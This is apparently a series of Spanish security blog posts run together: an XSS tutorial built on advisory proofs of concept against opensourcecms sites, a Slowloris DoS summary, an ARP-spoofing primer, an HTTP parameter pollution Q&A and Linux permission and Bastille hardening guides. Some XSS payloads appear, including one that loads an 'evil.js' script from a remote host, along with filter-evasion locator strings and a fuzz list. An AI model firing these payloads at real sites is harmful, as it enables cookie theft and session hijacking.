———————————————————————————————————————————————————————————————————————————-

Este va a ser el segundo post de la serie de Play & Fun with JavaScript que desde hoy sera usado para todo lo relacionado con XSS o con tips interesantes en JavaScript.
La finalidad de este post es iniciar a la gente en una de las vulnerabilidades Client Side (siempre y cuando tenga conocimientos previos de JavaScript o HTML), concretamente Cross Site Scripting, abreviado como XSS.

Las webs en cuestion fueron estas: | aspx.opensourcecms.com | php.opensourcecms.com | commercialcms.com | y el reporte en cuestión lo pueden encontrar en la zona Full-D CMS de unsersecurity.net aquí concretamente: CMS: OpenSource CMS Multiple Vulnerabilities. De este mismo reporte usaremos unicamente lo que nos interese.

+—————————————————————————–+

——++++=########################## Advisory & Vulnerabilites Information ##########################=++++——

Type: Web App Vuln
Details: 4 XSS & 1 FPD
Risk: Medium/High
Advisory ID: ASec-101
Discloure policy: RFpolicy

——++++=########################## ###################################### ##########################=++++——

Lo primero de todo vemos que el tipo de vulnerabilidad esta en una aplicacion web. Si nos fijamos en el campo de detalles (que es lo que nos interesa) nos muestra que se tratan de 4 XSS y un FPD. En este post nos centraremos unicamente en los XSS.

XSS es una vulnerabilidad producida por el incorrecto filtrado de ciertas variables que pueden pasar mediante GET, POST o incluso Trace. Cuando digo incorrecto filtrado me estoy refiriendo que caracteres como < > ; : ” ‘ () . + – * / son incorrectamente interpretados por la aplicacion vulnerable. El problema de esto es que si tenemos nociones minímas de JavaScript, sabremos que podemos usar esto a nuestro favor ejecutando código JS a nuestra voluntad.

Antes de continuar me gustaría explicar una cosa. JavaScript es un lenguaje que se ejecuta en el navegador, con lo cual la modificación  del código fuente de la página no se produce realmente, sino que nuestro script se ejecuta en el navegador del usuario en cuestión. Cuando modificamos el código fuente de una página inyectando JavaScript o HTML estaríamos hablando de otra vulnerabilidad: HTML injection. Continuemos ahora viendo el reporte

[+]XSS

1º [------XSS------]

Location: index.php
Method: GET
Url: http://php.opensourcecms.com/search/index.php?q=

PoC – Cookie Alert

http://php.opensourcecms.com/search/index.php?q=”><script>alert(document.cookie);</script>

[Response]:

PHPSESSID=bf2c97c8e104e8724ec728249fb87cb6; ………………………..

Bien! Aquí ya tenemos cosas muy interesantes. Fijemosnos en el campo Location, esto nos indica el nombre del archivo vulnerable (index.php), Method nos indica el tipo de petición que relaizemos [1] y ahora vamos al campo más interesante, la URL donde sinos fijamos al final aparece ?q= , a simple vista parece una letra normal pero no, esta q es la variable incorrectamente filtrada y la que vamos a aprovechar.

Pasemos a la Prueba de Concepto (PoC: Proof of Concept), la verdad es que no es de las mas interesantes no obstante vamos a analizar el código.

“><script>alert(document.cookie);</script>

“> : cerramos el tag html normalmente en caso de un buscador sera un <input>
<script></script> : abrimos y cerramos nuestro script
alert() : mediante el metodo alert, nos aparecerá una ventana donde el contenido será lo que haya entre ()
document.cookie : usamos el objeto document y la propiedad cookie, que muestra los valores de las cookies del documento actual

Como habran deducido esto nos muestra una ventana con el contenido de las cookies que nos han enviado esas páginas

Ahora si me disculpan voy  a saltarme el segundo XSS porque en el 3º puedo explicar dos cosas de golpe

3º [------XSS------]

Location: contactus.php
Method: POST
Url: http://php.opensourcecms.com/general/contactus.php

PoC – Post Parameters (I use Tamper data for change the post parameters)

name=”><script src=”http://testing.net/evil.js”></script>
email=”> other evil code

Supongamos que han leido todo hasta aquí, y que por ello no explicare los campos ya mencionados. Si nos fijamos en la parte del PoC, esta vez pone algo más interesante. Esta vez el metodo usado es POST, para “visualizar” los parametros vulnerables mejor recomiendo utilizar el Tamper Data[2]. Y ahora vamos a lo interesante:

name=”><script src=”http://testing.net/evil.js”></script>

Como pueden ver aqui estamos utilizando <script src= lo que hace este src es redireccionar a nuestra web donde se encuentrara nuestro evil script que contendrá código malicioso que se ejecutara en nuestro navegador. Otra forma de redireccionar por ejemplo a un stealer de cookies, es mediante document.location

Referencias y links de interés

• HTTP al descubierto by Vengador de las Sombras (The X-C3LL) & Sknight (Lix)
• Tamper Data Tutorial

Y hasta aquí lo interesante del reporte, los PoC’s del 2º y 4º XSS solo muestran numeros y texto asi que no creo que sea demasiado interés.

Para el próximo artículo de play & fun tratará sobre form tampering y sobre limitaciones en el output, ya veréis que vectores más chulos vais a ver

La herramienta en cuestión es un script realizado en Perl, que por cierto, no sólo requiere tener instalado el intérprete, sino que precisa además de una serie de librerías, tal y como se indica en la web del autor:

perl -MCPAN -e ‘install IO::Socket::INET’
perl -MCPAN -e ‘install IO::Socket::SSL’

El ataque consiste básicamente en abrir muchos threads contra una página web y dejar las peticiones a medias. Declara que va a enviar datos pero, realmente, nunca llega a hacer el resto del PUT.

Slowloris holds connections open by sending partial HTTP requests. It continues to send subsequent headers at regular intervals to keep the sockets from closing. In this way webservers can be quickly tied up. In particular, servers that have threading will tend to be vulnerable, by virtue of the fact that they attempt to limit the amount of threading they’ll allow. Slowloris must wait for all the sockets to become available before it’s successful at consuming them, so if it’s a high traffic website, it may take a while for the site to free up it’s sockets. So while you may be unable to see the website from your vantage point, others may still be able to see it until all sockets are freed by them and consumed by Slowloris. This is because other users of the system must finish their requests before the sockets become available for Slowloris to consume. If others re-initiate their connections in that brief time-period they’ll still be able to see the site. So it’s a bit of a race condition, but one that Slowloris will eventually always win – and sooner than later.

Para mas información pueden mirarse esto: Slowloris [ha.ckers]

La herramienta ha provocado un impacto grande, además, el problema no tiene una solución fácil, de hecho,  a fecha de hoy no hay ninguna solución que sea “completa”, ya que la mayoría de las “soluciones” restarían funcionalidad a los sistemas afectados, aunque ya se hayan publicado algunas alternativas, más bien para minimizar el ataque, en Security By Default.

Cabe destacar la herramienta PyLoris, una implementacion del slowloris pero en python (quizás mas entendible, en cuanto a código se refiera), eso si, este programa no es apto para kiddies  .

Tambien me gustaría mencionar el gran trabajo de c1c4tr1z (voodoo-labs & undersecurity [afiliado!]), ya que basandose en una prueba de concepto colgada en milw0rm (Link al PoC) ha desarrollado una versión en C intentando replicar este ataque.
/***

 * apache_dos.c - C1c4Tr1Z <c1c4tr1z@voodoo-labs.org>
 * C version of the D.O.S proof-of-concept by evilrabbi (http://www.milw0rm.com/exploits/8991)
 * voodoo-labs 2009 (http://voodoo-labs.org) & undersecurity (http://foro.undersecurity.net)
 * compile: gcc -o apache_dos apache_dos.c -lpthread
 ***/

Code completo aquí: apache_dos.c (undersecurity)

En cuanto a criptografía, un MITM es una técnica en el cual un atacante puede interceptar mensajes entre dos víctimas, siendo capaz de tener acceso y modificar la información transmitida entre las dos partes, todo esto sin que ninguna tenga conocimiento de éste.

Esquema de un ataque MITM, sacado de la página web de la OWASP. En este se ve cómo el atacante recibe la información que intercambian las víctimas (aquí un ordenador de escritorio y un servidor), sin que estas puedan apreciarlo.

Esta técnica puede ser utilizada con varios objetivos (aquí enumero los más comunes):

• Eavesdropping (literalmente, escuchar secretamente). Interceptar y acceder activamente a la información transmitida, por ejemplo, mediante un sniffer.

Diagrama de un ataque local de eavesdropping, obtenido de la web de la OWASP, en el que se ve cómo una contraseña enviada por la vítcima es interceptada por el atacante.

• Denegaciones de servicio, es decir, interrumpir el flujo de información entre víctimas, bloqueando la comunicación.
• Spoofing. Hacerse pasar por una de las víctimas para enviar información, modificarla…

La forma más usual de realizar este ataque, es mediante una técnica conocida como ARP Spoofing, también llamada ARP Poisoning, llevada a cabo en redes locales.

El protocolo ARP

El Adress Resolution Protocol, o protocolo de resolución de direcciones, se encarga de relacionar la dirección física o hardware de una tarjeta de interfaz de red con su dirección IP correspondiente a nivel de red, mediante peticiones ARP. Todo esto funciona mediante una serie de peticiones, que se agilizan gracias a unas tablas caché, llamadas tablas ARP, que guardan direcciones ya traducidas, que cuando pasa un determinado tiempo, se van borrando.

En el contexto del ataque, el ordenador atacante envenena las tablas ARP tanto del router como del equipo víctima, haciendo así que todo el tráfico pase por él, es decir, interceptándolo.

En la próxima entrega proporcionaremos un efoque más práctico al tema.

Un saludo!

YEHG.Net Greasemonkey Web Page Fingerprinter [x]

[URL]

https://arrivalsec.wordpress.com/wp-admin/post.php?action=edit&post=217

[Headers]

Server: nginx

Date: Sat, 06 Jun 2009 20:30:21 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-hacker: If you're reading this, you should visit automattic.com/jobs and apply to join the fun, mention this header.
X-Pingback: http://arrivalsec.wordpress.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 06 Jun 2009 20:30:21 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache

Content-length: 68875
Cookie: __qca=1244296460-19778041-72768616; __qcb=731321083; wordpress_test_cookie=WP+Cookie+check; wp-settings-5238014=hidetb%3D1%26editor%3Dtinymce%26uploader%3D1; wp-settings-time-5238014=1244320188
=> Edit Cookie

[RECON]

—Lookup—WebhostinfoDNSStuffRobtexDNSNetwork DNSRecordsDomainToolsSamSpadeHost2IPNetcraft WhatSiteNetcraft SiteReportNetwork TracertNetwork LookupNetwork WhoisBetterwhoisNetwork ExpressPortScan1PortScan2FlashPortScanMX ProfileMX LookupMX RecordsdirIndexingcache:link:site:emailfile:pdffile:xlsfile:xmlfile:docfile:pptfile:txtfile:rtffile:conffile:configfile:inifile:lstfile:zipfile:gzipfile:emlfile:psfile:exefile:rpmfile:dbfile:mdbfile:logfile:passwdfile:pwd [Launch all]   [Prepend Proxy]

[BruteForce Scan]

– Select —Dic-SmallDic-ComprehensiveBigCatalaCommonEuskeraMediumPasslistSpanishSubdomainsUserlistWeak_passwords_module_passlistWeak_passwords_module_userlistCommon_passNamesApacheCgiCgisColdfusionDominoFatwireFatwire_pagenamesFrontpageIisIplanetJrunNetwareOracle9iSharepointSunasTestsTomcatVignetteWeblogicWebsphereo-iiso-cfmo-jsp [Start]  [View]

Loading …

Do other stuffs.
Seem slowly? As it doesn’t do multi-requests,
it’s likely that web server IDS may not detect scanning.
But it’s for dictionary scanning only.

[Fuzz URL]

https://arrivalsec.wordpress.com/wp-admin/post.php?action=edit&post=217

Select Fuzz Type: Fuzz [default]BackupFilesHeaderCheckCSRFCS Framing [Help]

Fuzz Options Fuzz Db: — Check –1) —!><!–”>xxx<P>yyy..2) “><script>”..3) <script>..</script&gt..4) <<script>..;//<&lt..5) <script>..</script&gt..6) ‘><script>..<..7) “><script>..;</script&gt..8) \”;..;//..9) %3cscript%3e..;%3c/script%3e..10) %3cscript%3e..;%3c%2fscript%3e..11) %3Cscript%3E..;%3C/script%3E..12) &ltscript&gt..;</sc..13) &ltscript&gt..;&lt..14) <xss><script>alert(‘XSS’)&lt..15) <IMG%20SRC=’javascript:..16) <IMG SRC=”javascript:alert(‘XSS’..17) <IMG SRC=”javascript:alert(‘XSS’..18) <IMG SRC=javascript:alert(‘XSS’)>..19) <IMG SRC=JaVaScRiPt:alert(‘XSS’)>..20) <IMG SRC=javascript:alert(&quot;XSS&quo..21) <IMG SRC=`javascript:alert(“‘XSS’..22) <IMG “”"><SCRIPT>alert(..23) <IMG SRC=javascript:alert(String.fromCharCode(8..24) <IMG%20SRC=’javasc ript:..25) <IMG SRC=”jav ascript:alert(‘XSS’..26) <IMG SRC=”jav ascript:alert(‘..27) <IMG SRC=”jav ascript:alert(‘..28) <IMG SRC=”jav ascript:alert(‘..29) <IMG SRC=” &#14; javascript:alert(

Los permisos asociados a ficheros y directorios, son una de las medidas de seguridad básicas en los sistemas. Generalmente, el usuario propietario será la persona que ha creado el fichero, pero ésta puede ser alterada después de su creación. Existen tres tipos básicos de permisos, que son de:

• Lectura: permite a los usuarios leer el archivo especificado.
• Escritura: permite a los usuarios modificar el archivo especificado.
• Ejecución: permite a los usuarios ejecutar el archivo especificado.

Cuando se asignan estos permisos, Linux guarda un registro de los mismos que posteriormente aparece reflejado en la lista de archivos, con lo cual, se crea un estado que se expresa mediante marcas:

• r (read): acceso de lectura.
• w (write): acceso de escritura.
• x (execute): acceso de ejecución.

Dichas marcas, pueden ser visibles con un formato largo mediante el comando, ls -l. Ésta es una salida típica:

drwxr-xr-x 2 Pepe Pepe 4096 jun 6 12:50 lg
-rwxrwxr-x 1 Pepe Pepe 0 jun 6 12:49 kgl.py
drwxr-xr-x 2 Pepe Pepe 4096 jun 6 12:50 scripts

FIGURA 1.1: Propiedades de la tabla de permisos

Como podemos observar en la Figura 1.1, el primer carácter especifica el tipo de recurso. En este campo existen varios:

• - representa un archivo.
• b representa un archivo de bloques especial.
• c representa un archivo de caracteres especiales.
• d representa un directorio.
• l representa un enlace simbólico

Finalmente, los nueve caracteres restantes se dividen en tres grupos:

• Los permisos del propietario: estos permisos muestran el acceso del propietario del archivo
• Permisos de grupo: estos permisos muestran el acceso del grupo al archivo.
• Permisos mundiales: estos permisos muestran los derechos que tiene el resto del mundo a acceder a este archivo (si tiene alguno).

Vamos a aplicar esto al script en Python de Pepe. Como podemos observar, este recurso es un archivo.

-rwxrwxr-x 1 Pepe Pepe 0 jun 6 12:49 kgl.py

Por consiguiente, Pepe (el propietario del archivo) tiene todos los derechos de acceso en él, con lo cual puede leer, escribir y ejecutar el archivo.

-rwxrwxr-x 1 Pepe Pepe 0 jun 6 12:49 kgl.py

De igual modo, los usuarios del grupo (del grupo Pepe) también pueden leerlo, escribirlo y ejecutarlo.

-rwxrwxr-x 1 Pepe Pepe 0 jun 6 12:49 kgl.py

Y finalmente, aquellos que no sean Pepe y que no pertenezcan a su grupo, tienen derecho a leer y ejecutar el archivo, pero en cambio, no pueden escribir en él.

En resumen:

• El primer carácter representa normalmente si es un archivo (-) o un directorio (d).
• El primer conjunto de los tres caracteres indica los privilegios del usuario.
• El siguiente conjunto, los privilegios del grupo.
• Y finalmente, el último conjunto indica los privilegios del resto de usuarios.

chmod: cambiar los permisos de los archivos

Para definir los permisos a un usuario concreto sobre un archivo o un directorio, se utiliza el comando chmod. Existen tres tipos de operadores:

• El operador - quita los permisos.
• El operador + agrega permisos.
• El operador = asigna permisos.

Veámos un claro resumen de como podemos quitar, agregar o asignar estos operadores.

• r: Éste carácter añade o quita el permiso de lectura. Ejemplo: chmod +r nombre de archivo
• w: Éste carácter añade o quita el permiso de escritura. Ejemplo: chmod -w nombre de archivo
• x: Éste carácter añade o quita el permiso de ejecución. Ejemplo: chmod +x nombre de archivo

Un método consiste en añadir letras (r, w, x) para asignar permisos a archivos individuales o directorios. Otro es utilizar el sistema octal, con el cual se pueden añadir valores octales y que veremos en el siguiente apartado.

Sistema octal

El sistema octal, es un sistema numérico en base 8 que utiliza los dígitos de 0 a 7.

La siguiente tabla resume el esquema octal y lo que representa cada número, aunque seguidamente lo veremos con más detalle.

FIGURA 1.2: Valores octales

• 0000: Equivale a --- por lo que no tenemos ningún permiso.
• 0001: Equivale a --x por lo que el propietario tiene permisos de ejecución.
• 0002: Equivale a -w- por lo que el propietario tiene permisos de escritura.
• 0004: Equivale a r-- por lo que el propietario tiene permisos de lectura.
• 0010: Equivale a --x por lo que X grupo tiene permisos de ejecución.
• 0020: Equivale a -w- por lo que X grupo tiene permisos de escritura.
• 0040: Equivale a r-- por lo que X grupo tiene permisos de lectura.
• 0100: Equivale a --x por lo que otros tienen permisos de ejecución.
• 0200: Equivale a -w- por lo que otros tienen permisos de escritura.
• 0400: Equivale a r-- por lo que otros tienen permisos de lectura.
• 1000: Éste modo denominado Sticky bit, es aplicado a directorios importantes (como /tmp) con privilegios especiales. El bit asignado a un directorio sólo puede ser renombrado o borrado por el propietario del elemento del directorio o root aunque el resto tenga permisos de escritura. Además, éstos se indentifican mediante una t en la última posición de la propiedad de permisos. Ejemplo: drwxrwxrwt 13 root root 4096 jun 6 22:44 tmp
• 2000: Éste modo denominado bit SETGID (Set Group ID) está orientado a facilitar el trabajo en grupo cuando varios usuarios deben de acceder a una colección común de ficheros y directorios. Se representan mediante la letra S. Por ejemplo, drwxrws--- 2 Pepe profesorado 4096 jun 3 22:12 Documentos el propietario del directorio y los miembros del grupo profesorado pueden acceder a este directorio. Los usuarios que no sean miembros de este grupo se “asignan” al mismo, con lo cual puede suponer un riesgo de seguridad si se definiera el valor root SUID en un programa.
• 4000: Finalmente, éste modo denominado bit SETUID (Set User ID) es un atributo de archivo especial que indica al sistema que debe ejecutar los programas marcados con un ID de usuario en concreto. Por ejemplo, el programa vipw normalmente necesita permisos de usuario root para acceder a /etc/passwd, por tanto un usuario normal no podría cambiar dicho archivo, ya que sería demasiado peligroso otorgar a todos los usuarios acceso directo a él.

NOTA: Si los atacantes pueden explotar las debilidades de los programas root de SUID, potencialmente pueden obtener privilegios de root.
Los archivos de bit SUID y SGID pueden ser buscados de la siguiente forma: find / \( -perm -4000 -o -perm 2000 \) -ls > archivos_con_suid_sgid.txt con lo que nos hará un listado en un archivo de texto que posteriormente podemos analizar para otorgar los permisos adecuados para así, obtener un sistema mucho más seguro.

Finalmente, podemos facilitar las cosas reduciendo rápidamente los permisos del propietario, de grupos y otros usuarios a un número de tres dígitos utilizando los siguientes valores:

• 0: Sin permisos.
• 1: Ejecución.
• 2: Escritura
• 3: Escritura y ejecución (actualmente no se utiliza mucho).
• 4: Lectura.
• 5: Lectura y ejecución.
• 6: Lectura y escritura.
• 7: Todo el conjunto: lectura, escritura y ejecución.

Veámos un caso práctico:

[cloti@ ~]$ pwd; cd /home/pepe/
/home/cloti
bash: cd: /home/pepe/: Permiso denegado

[pepe@ ~]$ chmod 755 /home/pepe/; ls -l /home
drwx------ 4 cloti secretaria 4096 jun 7 01:45 cloti
drwx------ 4 juan profesorado 4096 jun 7 01:45 juan
drwxr-xr-x 4 pepe profesorado 4096 jun 7 01:41 pepe


[cloti@ ~]$ cd /home/pepe/; ls -l
-rw-r--r-- 1 pepe profesorado 548 jun 7 02:20 Álgebras.doc
drwxr-xr-x 2 pepe profesorado 4096 jun 7 02:19 Exámenes
drwxr-xr-x 2 pepe profesorado 4096 jun 7 02:20 Física
drwxr-xr-x 2 pepe profesorado 4096 jun 7 02:20 Matemáticas
drwxr-xr-x 2 pepe profesorado 4096 jun 7 02:20 Prueba de acceso
-rw-r--r-- 1 pepe profesorado 897 jun 7 02:20 Tema 4 Funciones.docx


Primeramente, podemos observar como el usuario cloti intenta acceder a la carpeta pepe (/home/pepe), la cual le deniega el acceso. Seguidamente, nuestro protagonista Pepe ha decidido darle permisos de lectura y ejecución a Cloti, que posteriormente ha podido acceder igual que podría hacerlo Juan siendo éste de su mismo grupo.

Q: Is this a new class of exploits or just another case of applications lacking input validation?
A: Actually, HPP is an input validation flaw. As SQL Injection and XSS, we may consider it as an injection weakness.
In this specific case, query string delimiters are the “dangerous” characters.

Q: You are saying that several HTTP back-ends manage multiple occurrences in different ways. In some cases, it may be abused in order to fingerprint the underline back-end. Is it right?
A: Yes, sure. However, considering the granularity available, we don’t think it is really so interesting.

Q: This is a known attack. You guys presented a bunch of interesting but already known techniques to exploit different vulnerabilities.
A: Actually, we think we have contributed (in some way) to the current state-of-art showing this issue. However, even if it is currently used by ‘hard-core’ attackers, it’s very important to formalize a threat in order to mitigate the issue and create efficient workarounds.
The aim of the entire research is to raise awareness around this problem.
In future, we would like to include HPP within the OWASP Testing Guide in order to provide the right methodology for testing systems against HPP-like attacks as well.
We strongly believe that sharing such knowledge may increase the security of all web applications.

Q: Most of your examples and findings use GET parameters. What about POST?
A: POST and COOKIE parameters may be affected as well. In slide #11 and #19, we have briefly stated that and you will see further research because it is a very interesting aspect since it gives additional flexibility for all attacks.

Q: In the current version of IE8, is the XSS Filter still vulnerable to HPP?
A: No! We had a discussion with the IE XSS Filter guy at Microsoft and turns out that the current version is NOT affected. All previous tests were done against the beta release and we didn’t double check the latest one. We are sorry for this misunderstanding.

Q: Are multiple occurrences of a parameter valid according to the RFC, W3C, whatever?
A: Yes! Yes! The only thing which in fact was worth mentioning is the lack of standard in the _management_ of multiple occurrences and NOT the presence of multiple occurrences themselves.
After all, that’s why it is possible to abuse the query string delimiters injection flaw.

Q: Is Yahoo! Mail still vulnerable to HPP?
A: Difficult to say. However, the specific issue was patched thus it cannot be abused by malicious users.

Q: Could you provide additional details regarding the Yahoo! Classic Mail HPP attack?
A: I’ve just published here an in-depth review of the issue with the video PoC as well.

Q: What’s the right way of managing multiple occurrences? Is there a ‘perfect’ framework?
A: No, there are no right o wrong behaviors as well as we cannot refer to a right or wrong web servers/web frameworks. The behavior of the HTTP back-ends is a matter of exploitability, only.

Q: HPP is only about WAFs bypasses?
A: Absolutely not! HPP is also about applications flow manipulation, anti-CSRF, content pollution.

Q: How can I prevent HPP?
A: First of all, answer yourself “Which layer am I protecting?”.
Then, speaking about HPP server side, it’s always important to use URL encoding whenever you do GET/POST HTTP requests to an HTTP back-end.
From the client-side point of view, use URL encoding whenever you are going to include user-supplied content within links, etc.

Q: Am I vulnerable to HPP?
A: It depends on how you are managing several occurrences of the same parameter from the application point of view. Using strict input validation checkpoints and the right output filtering (URL encoding), you are likely secure (at least, against HPP :p).

Para más información pueden descargar la presentación de la charla: HTTP Parameter Pollution

Un saludo!

”;!–”<XSS>=&{()}

Con esto conseguimos ver qué caracteres se filtran, y cuales no, para así, interpretando correctamente los resultados, tanto en la respuesta de la web como en el código fuente, desarrollar una sentencia que pueda vulnerar dicho filtro.

Aquí os dejo otro locator, proporcionado por Lix (gracias), sacado de aquí :

‘;alert(0)//\’;alert(1)//”;alert(2)//\”;alert(3)//–></SCRIPT>”">’><SCRIPT>alert(4)</SCRIPT>=&{}”");}alert(6);function xss(){//”

Espero que sea de utilidad.

El 28 de Abril de 2009 un tal Ying mando un mail a bugtrag que decía más o menos esto (traducción literal):

Hola a todos
Estoy haciendo una lista de herramientas de seguridad. La idea es que esta lista esté echa por todos y para todos. Esto también está destinado para los colaboradores de backtrack y wifislax. Para aquellos que quieran colaborar, he creado un formulario utilizando google docs donde pueden enviar sus ideas o tools. Aceptamos todo tipo de sugerencias.

Cuando tengo una lista lo suficientemente larga la publicaré, si quieren preguntar por las herramientas que hay no tienen más que hacerlo.

La url del formulario de google docs es:

http://spreadsheets.google.com/viewform?hl=en&formkey=cjRsNFh5cENXT2pra3lYOXU4aXNUVFE6MA

Saludos a todos.

El topic tuvo bastante éxito y recibió varias respuestas, más tarde, concretamente dos días después se público la primera versión de dicha lista. Más tarde, (12 de mayo) la primera versión de la lista fue modificada clasificando las herramientas por sistema operativo o por el tipo de funcionamiento.

La url de dicho proyecto es esta: Security Tools List

Algunas otras páginas de este tipo son:

http://www.slac.stanford.edu/xorg/nmtf/nmtf-tools.html (Network Monitoring tools [thanks Pr0x])

http://www.vulnerabilityassessment.co.uk/index.htm (más que nada enfocada a la enumeración)

¡Muchas gracias a todos!

INTRODUCCIÓN

En este artículo aprenderemos a manejar Bastille, desde su instalación y configuración exhaustivamente para proporcionar una mayor seguridad de nuestro sistema Linux. Bastille es una de las tantas herramientas de hardening con el que ahorramos bastante tiempo desde la configuración de cada archivo individual hasta la programación para el fortalecimiento del mismo pudiendo ejecutarse bajo Linux, HP-UX e incluso MacOS X. Con ella podemos realizar bastantes tareas como deshabilitar servicios y puertos innecesarios. Además, cabe decir que, Bastille es un conjunto de scripts en Perl que toma la información que le indiquemos desde una set de preguntas y respuestas de las que ya comentaré a lo largo de este artículo desde una interfaz bastante amigable.

He aquí una lista de las características que nos ofrece Bastille, pero que puede variar a medida de que aparezcan nuevas versiones.

NOTA: Este artículo ha sido elaborado con la versión 3.0.9 de Bastille.

- Aplicar permisos restrictivos en las utilidades de administrador: Permite tan solo a root leer y ejecutar las utilidades habituales de administrador como ifconfig, linuxconf, ping, traceroute y runlevel, deshabilitando el estado del SUID root para estas herramientas , de modo que los usuarios no fueran root, no pudieran usarlo.

- Deshabilitar los protocolos r: Los protocolos r permiten a los usuarios entrar en sistemas remotos usando una autenticación en base a la IP. Esta autenticación permite sólo a determinadas IP acceder remotamente a un sistema. Dado que esta autenticación se basa en la dirección IP, un intruso que ha descubierto una IP autorizada puede crear paquetes camuflados que parecen provenir de ese sistema autorizado. (Véase como ejemplo: RPC)

- Implementar caducidad de contraseñas: Los sistemas Linux por defecto permiten contraseñas que expiran después de 99.999 días. Dado que esto es demasiado en un entorno seguro, Bastille ofrece cambiar la expiración de la contraseña a 180 días. Estas configuraciones están escritas en el archivo /etc/login.defs que pueden ser modificadas posteriormente con un editor cualquiera.

- Deshabilitar Control-Alt-Supr para reiniciar: Esto no permite reiniciar la máquina, algo bastante esencial si nos referimos a su seguridad física.

- Optimizar las envolturas TCP: Esta elección modifica el archivo inetd.conf y el archivo /etc/hosts.allow de modo que inetd debe contactar con las envolturas TCP siempre que reciba una petición en lugar de ejecutar automáticamente el servicio solicitado. Las envolturas TCP determinarán si la dirección IP solicitante está autorizada para ejecutar el servicio en particular. Si la petición no está permitida, se deniega y el intento se registra. Aunque la autenticación basada en IP puede ser vulnerable, esta optimización añade una capa de seguridad en el proceso. No está recomendado para la mayoría de escenarios.

- Añadir mensajes de autorización de uso: Estos mensajes aparecen automáticamente cuando alguien accede en el sistema.

- Limitar el uso de los recursos del sistema: Si limita el uso de los recursos del sistema, puede reducir las oportunidades de fallo de un servidor a un ataque DoS. Si elige limitar el uso de los recursos del sistema en Bastille, se producirán los siguientes cambios:

• El tamaño de archivos se limita a 40 MB
• Cada usuario se limita a 150 procesos.
• El número de archivos del core permitidos por usuario se configura a cero. Los archivos del core se usan para tratar problemas del sistema. Son grandes y utilizables si se obtiene el control de los mismos: pueden crecer y consumir su sistema de archivos.

- Restringir el acceso a consola: Cualquiera con acceso a la consola tiene derechos especiales, como montar un CD-ROM. Bastille puede especificar qué cuentas de usuario tienen acceso para entrar por consola.

- Registro remoto y adicional: Dos registros adicionales podrían añadirse a /var/log:

• /var/log/kernel (mensajes del kernel)
• /var/log/syslog (mensajes de error y avisos) Puede también hacer el registro de un host remoto si existe.

- Configuración de cuenta de procesos: Le permite registrar los comandos de todos los usuarios. También registra cuando fueron ejecutados los comandos. Este archivo de registro son útiles para el seguimiento de un intruso en un sistema, pero el archivo puede llegar rápidamente a ser muy grande. Si se tiene acceso root, lógicamente puede ser eliminado.

- Desactivar NFS y Samba: Le permite deshabilitar los servicios NFS y Samba.
Samba proporciona un sistema de archivos compartido. A menos que el cortafuegos se configure para bloquear los paquetes o el administrador asegure estos servicios. Bastille recomienda desactivarlos.

- Fortalecer el servidor Web Apache: Debería desactivarse si el servicio (httpd) no es utilizado.

IMPLEMENTACIÓN

Bajo Linux, Bastille es ofrecida desde los repositorios de nuestra distribución, pero si por algún caso no la estuviera, tendríamos la posibilidad de descargarla desde su propia página oficial. Aunque en este artículo nos centraremos en la instalación desde su propio código fuente, así qué ¡allá vamos!

$ cd /tmp; wget http://nfsi.dl.sourceforge.net/sourceforge/bastille-linux/Bastille-3.0.9.tar.bz2; tar -xjvf Bastille*; cd Bastille; ./Install.sh

Una vez instalado, ejecutaremos Bastille desde la línea de comandos. Para ello tenemos dos intefaces disponibles, una basada en Ncurses (bastille -x) y otra en Tk (bastille -c)

NOTA: Debemos de tener instalado Perl-Tk para su ejecución.

Una vez ejecutado, podemos observar que nos encontramos con una pantalla de bienvenida, la cual está dividida en grupos y funciones y a su vez, las funciones están divididas en preguntas relacionadas a los grupos que veremos ahora.

NOTA: Todas las elecciones que implemente en Bastille se registran en el archivo /root/Bastille/config.

• Grupo: FilePermissions
  Would you like to set more restrictive permissions on the administration utilities? [N]: Útil en máquinas con múltiples cuentas de usuario. Hay utilidades que en general, sólo son ejecutadas por el administrador de la máquina aunque por defecto los usuarios habituales tienen acceso a ellas, al menos a parte de sus funcionalidades, como pueden ser los comandos top o ifconfig. Para evitar los posible problemas de seguridad a los que podría dar lugar a esto, Bastille puede cambiar los permisos de las mencionadas aplicaciones con el fin de asegurar que sólo el administrador pueda ejecutarlas. Si usted es el único usuario de la máquina no tiene sentido que habilite esta opción. Si cuenta con otros usuarios que acceden a ella, sí que sería interesante añadir esta opción.
• Grupo: FilePermissions
  Would you like to disable SUID status for mount/umount? [Y]: En general, los programas que tienen el atributo SUID son muy peligrosos ya que pueden ser invocados por usuarios normales, se ejecutan con privilegios de superusuario. Esto no entrañaría ningún riesgo si estos programas se limitasen a hacer aquello para lo que fueron diseñados, el problema está en que es relativamente habitual que se descubran bugs en estas aplicaciones que permitan “engañarlas” para que hagan funciones indeseables con privilegios de superusuario. Si dice que sí en esta pregunta, Bastille se asegurará de que el comando mount/umount sólo pueda ser ejecutado por aquellos que conozcan la contraseña de superusuario, reduciendo así la exposición al riesgo del equipo.
• Grupo: FilePermissions
  Would you like to disable SUID status for ping? [Y]: Similar al anterior.
• Grupo: FilePermissions
  Would you like to disable SUID status por at? [Y]: El comando at se utiliza para programar tareas individualmente para que se ejecute en un momento dado. Históricamente han sido muchas hazañas que se han aprovechado, por consecuente es recomendable desactivarlo.
• Grupo: FilePermissions
  Would you like to disable the r-tools? [Y]: Las llamadas r-tools son un conjunto de utilidades para la administración remota de equipos, como pueden ser rlogin, rsh, rdist, rpc y similares. El problema con estas herramientas es que todas las transacciones son hechas en texto plano, es decir, la información no es enviada ni recibida de forma cifrada lo que representa un riesgo de seguridad si la transferencia es víctima de sniffing. Contestar afirmativamente a esta pregunta deshabilitaría el uso completo de las herramientas a todos los usuarios (incluyendo root) lo cual es recomendable tomando en cuenta que cada una de estas herramientas tiene actualmente equivalentes más seguras basadas en OpenSSL, PAM, SSH y similares.
• Grupo: FilePermissions
  Would you like to disable SUID status for usernetctl? [Y]: usernetctl, es una utilidad similar a ifconfig que permite a los usuarios normales el control a las interfaces de red, lo cual es recomendable deshabilitarlo.
• Grupo: AccountSecurity
  Pregunta: Should Bastille disable clear-text r-protocols that use IP-based authentication? [Y]:
